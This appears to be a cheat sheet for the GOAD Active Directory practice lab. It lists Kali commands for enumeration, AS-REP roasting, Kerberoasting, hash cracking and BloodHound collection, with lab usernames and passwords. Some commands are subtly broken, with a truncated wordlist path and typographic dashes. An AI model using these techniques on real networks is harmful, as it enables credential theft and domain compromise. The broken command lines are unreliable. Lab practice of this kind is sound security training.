GOAD Cheat Sheet

The commands in the guide are outdated and no longer work in most cases. Here I’ll provide updated examples that work in Kali today.

nmap -Pn -p- -sC -sV -oA full_scan_goad 10.3.10.10-12,22-23

crackmapexec smb 10.3.10.11 --users

crackmapexec smb 10.3.10.11 --pass-pol

enum4linux 10.3.10.11

rpcclient -U "NORTH\" 10.3.10.11 -N

net rpc group members 'Domain Users' -W 'NORTH' -I '10.3.10.11' -U '%'

curl -s https://www.hbo.com/game-of-thrones/cast-and-crew | grep 'href="/game-of-thrones/cast-and-crew/'| grep -o 'aria-label="[^"]*"' | cut -d '"' -f 2 | awk '{if($2 == "") {print tolower($1)} else {print tolower($1) "." tolower($2);} }' > got_users.txt

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 10.3.10.10

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 10.3.10.12

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 10.3.10.11

crackmapexec smb -u khal.drogo -p horse -d essos.local 10.3.10.12 --users

crackmapexec smb 10.3.10.10-23 -u 'a' -p '' --shares

impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile sevenkingdoms_users.txt

cd /usr/share/wordlists
sudo gunzip rockyou.txt.gz
sudo chown kali:kali rockyou.txt

hashcat -m 18200 arsephash /usr/share/wordlists/rockyou.tx

crackmapexec smb 192.168.56.11 -u sevenkingdoms_users.txt -p sevenkingdoms_users.txt --no-bruteforce

impacket-GetADUsers -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople

ldapsearch -H ldap://10.3.10.11 -D “brandon.stark@north.sevenkingdoms.local” -w iseedeadpeople -b ‘DC=north,DC=sevenkingdoms,DC=local’ “(&(objectCategory=person)(objectClass=user))” |grep ‘distinguishedName:’

ldapsearch -H ldap://10.3.10.12 -D “brandon.stark@north.sevenkingdoms.local” -w iseedeadpeople -b ‘,DC=essos,DC=local’ “(&(objectCategory=person)(objectClass=user))”

ldapsearch -H ldap://10.3.10.10 -D “brandon.stark@north.sevenkingdoms.local” -w iseedeadpeople -b ‘DC=sevenkingdoms,DC=local’ “(&(objectCategory=person)(objectClass=user))”

impacket-GetUserSPNs -request -dc-ip 10.3.10.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes

sudo apt install ntpdate -y

sudo ntpdate 10.3.10.11

impacket-GetUserSPNs north.sevenkingdoms.local/brandon.stark:iseedeadpeople -dc-ip 10.3.10.11 -request

hashcat -m 13100 –force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt –force

crackmapexec smb 10.3.10.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local –shares

git clone https://github.com/dirkjanm/adidnsdump && cd adidnsdump

pip install . –break-system-packages

adidnsdump -u ‘north.sevenkingdoms.local\jon.snow’ -p ‘iknownothing’ winterfell.north.sevenkingdoms.local

bloodhound-python –zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local -gc winterfell.north.sevenkingdoms.local -ns 10.3.10.11

bloodhound-python –zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local -gc kingslanding.sevenkingdoms.local -ns 10.3.10.11

bloodhound-python –zip -c All -d essos.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc meereen.essos.local -gc meereen.essos.local -ns 10.3.10.11